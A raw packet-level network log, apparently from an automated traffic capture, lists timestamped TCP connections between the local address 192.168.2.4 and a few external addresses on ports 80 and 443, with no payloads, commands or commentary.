Jul 27, 2024 08:54:03.645524025 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645535946 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645541906 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645558119 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645571947 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645574093 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645589113 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645600080 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645606041 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645621061 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645633936 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645637989 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645653009 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645668030 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645669937 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645684004 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645699024 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645709991 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645714045 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645726919 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645729065 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645744085 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645760059 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645760059 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645776987 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.645802021 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645821095 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.645989895 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646163940 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646282911 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646297932 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646311998 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646312952 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646328926 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646327972 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646344900 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646361113 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646364927 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646394968 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646399021 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646415949 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646418095 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646434069 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646447897 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646449089 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646475077 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646485090 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646490097 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646505117 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646521091 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646522045 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646536112 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646549940 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646558046 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646567106 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646579027 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646581888 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646599054 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646612883 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.646615028 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.646637917 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.675899029 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.675930977 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.675947905 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.675962925 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.675978899 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.675992966 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676012039 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676026106 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676042080 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676057100 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676071882 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676086903 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676103115 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676119089 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676129103 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676129103 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676129103 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676129103 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676129103 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676130056 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676148891 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676172018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676198959 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676209927 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676211119 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676209927 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676235914 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676249981 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676250935 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676266909 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676281929 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676287889 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676295996 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676307917 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676311016 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676326036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676341057 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676346064 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676356077 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676368952 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676372051 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676386118 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676398039 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676403046 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676417112 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676434040 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676444054 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676449060 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676465988 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676466942 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676479101 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676498890 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676523924 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676548004 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676562071 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676564932 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676579952 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676594019 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676594019 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676609039 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676624060 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676635981 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676637888 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676650047 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676661015 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676665068 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676680088 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676682949 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676697016 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676706076 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676712036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676728010 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676742077 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676745892 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676779032 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676800013 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676821947 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676836967 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676846981 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676852942 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676878929 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676882982 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676903009 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676928043 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676930904 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676942110 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676956892 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676970005 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.676980972 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.676985025 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677000999 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677001953 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677016020 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677023888 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677031994 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677047014 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677062988 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677066088 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677079916 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677092075 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677094936 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677112103 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677119970 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677164078 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677226067 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677241087 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677257061 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677270889 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677287102 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677288055 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677301884 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677318096 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677320004 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677342892 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677386045 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677401066 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677416086 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677438021 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677454948 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677803040 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677826881 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677841902 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677858114 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677871943 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677872896 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677890062 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677906036 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677907944 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677921057 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677936077 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677937984 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677953005 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677968025 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677973986 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677983046 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.677994013 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.677999020 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.678015947 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.678030968 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.678033113 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.678046942 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.678056002 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.678065062 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.678097010 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.681957960 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.681994915 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682012081 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682024956 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.682028055 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682044983 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682060003 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682064056 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.682075977 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682087898 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.682092905 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682111025 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682126999 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682127953 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.682142973 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682157993 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682173014 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682178020 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.682178020 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.682189941 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682204962 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682221889 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.682226896 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.682248116 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.736979008 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768690109 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768712044 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768728018 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768743038 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768758059 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768771887 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768786907 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768800974 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768827915 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768843889 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768860102 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768874884 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768881083 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768881083 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768882036 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768882036 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768882036 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768888950 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768904924 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768920898 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768934965 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768950939 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768959045 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768959045 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768966913 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.768985033 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.768985987 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:03.769021988 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.815080881 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:03.834491968 CEST	50692	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:03.840029955 CEST	80	50692	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:03.840238094 CEST	50692	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:03.840239048 CEST	50692	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:03.840239048 CEST	50692	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:03.845679045 CEST	80	50692	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:03.845695972 CEST	80	50692	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:05.051981926 CEST	80	50692	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:05.052028894 CEST	80	50692	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:05.052244902 CEST	50692	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:05.052330017 CEST	50692	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:05.054738045 CEST	50693	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:05.057890892 CEST	80	50692	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:05.060247898 CEST	80	50693	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:05.060452938 CEST	50693	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:05.061479092 CEST	50693	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:05.061480045 CEST	50693	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:05.066896915 CEST	80	50693	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:05.066937923 CEST	80	50693	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:06.289181948 CEST	80	50693	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:06.289232016 CEST	80	50693	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:06.289309025 CEST	50693	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:06.289413929 CEST	50693	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:06.291775942 CEST	50694	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:06.297945976 CEST	80	50693	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:06.297966003 CEST	80	50694	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:06.298048019 CEST	50694	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:06.298154116 CEST	50694	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:06.298177004 CEST	50694	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:06.303363085 CEST	80	50694	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:06.303380966 CEST	80	50694	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:07.532911062 CEST	80	50694	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:07.532953978 CEST	80	50694	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:07.533058882 CEST	50694	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:07.533193111 CEST	50694	80	192.168.2.4	78.89.199.216
Jul 27, 2024 08:54:07.538656950 CEST	80	50694	78.89.199.216	192.168.2.4
Jul 27, 2024 08:54:07.557764053 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:07.557805061 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:07.558012009 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:07.558219910 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:07.558234930 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.117851019 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:08.121406078 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:08.121406078 CEST	50691	80	192.168.2.4	64.190.113.113
Jul 27, 2024 08:54:08.127093077 CEST	80	50691	64.190.113.113	192.168.2.4
Jul 27, 2024 08:54:08.327672005 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.327908039 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.329279900 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.329323053 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.329802036 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.339185953 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.384531021 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.749044895 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.799469948 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.879064083 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.879079103 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.879266024 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.879271984 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.879271984 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.879319906 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.879359007 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.879375935 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.879398108 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.879398108 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.879412889 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.879422903 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.880389929 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.880409956 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.880549908 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.880551100 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:08.880579948 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:08.880815983 CEST	50695	443	192.168.2.4	185.149.100.242
Jul 27, 2024 08:54:09.019054890 CEST	443	50695	185.149.100.242	192.168.2.4
Jul 27, 2024 08:54:09.019085884 CEST	443	50695	185.149.100.242	192.168.2.4
